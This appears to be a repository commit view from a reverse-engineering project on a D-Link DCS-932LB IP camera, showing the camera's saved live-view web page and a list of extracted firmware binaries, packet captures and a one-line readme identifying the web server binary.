<tr>
<td valign="top" width="131" height="100%" align="right">
<!-- === BEGIN SIDENAV === -->
<table border="0" cellpadding="1" cellspacing="1" height=100% bgcolor="#FFFFFF">
<tr id="sidenav_container"><td id="sidenavon"><a href="home.htm">Camera</a></td></tr>
<tr id="sidenav_container"><td id="sidenavoff"><a href="logout.htm">Logout</a></td></tr>
<tr id="sidenav_container" height=100%><td id="sidenavoff" valign="top">
<div style="padding: 39px 0px 0px 4px; font-size: 11px;"><font color=white>Language :</font></div>
&nbsp;<SELECT id="WebLanguageSel" size="1" onchange="document.forms[1].WebLanguage.value = this.value;ClickSubmit()">
<OPTION value="0" selected>English</OPTION>
<OPTION value="1">&#31616;&#20307;&#20013;&#25991;</OPTION>
<OPTION value="2">&#32321;&#39636;&#20013;&#25991;</OPTION>
<OPTION value="3">Deutsch</OPTION>
<OPTION value="4">fran&ccedil;ais</OPTION>
<OPTION value="5">Italiano</OPTION>
<OPTION value="6">Espa&ntilde;ol</OPTION>
<OPTION value="7">&#54620;&#44397;&#51032;</OPTION>
</SELECT>
</td></tr>
</table>
<!-- === END SIDENAV === -->
</td>
<td valign="top" id="maincontent_container" height="420">
<table height="420" width=100% border="0" cellpadding="0" cellspacing="0" bgcolor="white">
<tr><td>
<div id="maincontent">
<!-- === BEGIN MAINCONTENT === -->
<div id="box_header">
<h1>Camera</h1>
This section shows your IP camera's live video. You can control your settings using the buttons below.<br>
Current resolution is 320x240.
</div>
<div class="box">
<h2>Function</h2>
<a href="aview.htm" style="padding: 0px 3px 0px 0px;TEXT-DECORATION: none" style="padding: 0px 3px 0px 0px;TEXT-DECORATION: none"><img src="radiooff.gif" border="0"></a>ActiveX&nbsp;
<a href="jview.htm" style="padding: 0px 3px 0px 0px;TEXT-DECORATION: none" style="padding: 0px 3px 0px 0px;TEXT-DECORATION: none"><img src="radiooff.gif" border="0"></a>Java&nbsp;
</div>
<div class="box">
<h2>Live Video</h2>
<table cellpadding="2" cellspacing="0" border="0" width="534" bgcolor="white" bordercolor="#000000">
<tr><td align="center">
<table bgcolor=black BORDER=0 CELLSPACING=0 CELLPADDING=0>
<tr style="height: 17px">
<td nowrap><font color=white>DCS-932LB<br></font></td>
<td nowrap align=right valign=top>&nbsp;&nbsp;<font color=white>11-20-2018 04:01:39 PM</font></td>
</tr>
<tr>
<td colspan=2 align=center bgcolor="white">
<IMG src="image.jpg?cidx=1123385723" BORDER="0">
</td>
</tr>
</table>
</td></tr>
</table>
</div>
<!-- === END MAINCONTENT === -->
</div>
</td></tr>
<tr height=100%><td></td></tr>
</table>
</td>
</tr>
</table>
</td></tr></table>
<table id="footer_container" border="0" cellpadding="0" cellspacing="0" width="838" align="center">
<tr>
<td width="125" align="center">&nbsp;&nbsp;<img src="security.gif" width="114" height="35"></td>
<td width="10">&nbsp;</td>
<td>&nbsp;</td>
</tr>
</table><br>
<div align="center"><FONT color=#ffffff>Copyright <script language="Javascript">Copyright(2010);</script>, D-Link Corporation / D-Link Systems, Inc. All rights reserved.</font></div>
<br>
</form>
</body>
<FORM ACTION="/setSystemLanguage" METHOD="POST" autocomplete="off">
<input type="hidden" name="ReplySuccessPage" value="top.htm">
<input type="hidden" name="ReplyErrorPage" value="top.htm">
<input type="hidden" name="WebLanguage" value="0">
<input type="hidden" name="ConfigSystemLanguage" value="Save">
</Form>
<FORM id="redir" name="redir" ACTION="/" METHOD="POST" autocomplete="off">
<input type="hidden" name="ReplySuccessPage" value="">
<input type="hidden" name="ReplyErrorPage" value="">
</Form>
<script language="Javascript">
InitAUTO();
</script>
</html>

0
dissasembleRalinkInit/ralink_init.id1 → tests/http:192.168.1.119
View File

BIN
verb/binary/attemp2/fs/cpio/temp/alphapd Executable file
View File

Binary file not shown.

BIN
verb/binary/attemp2/fs/cpio/temp/nvram_daemon Executable file
View File

Binary file not shown.

2
verb/binary/attemp2/fs/cpio/temp/readme.md Normal file
View File

@@ -0,0 +1,2 @@
alphapd seems to be the httpd server

BIN
whatthehelldidifind.pcapng Normal file
View File

Binary file not shown.

BIN
wiresharkTelnetCapturePort8385.pcapng Normal file
View File

Binary file not shown.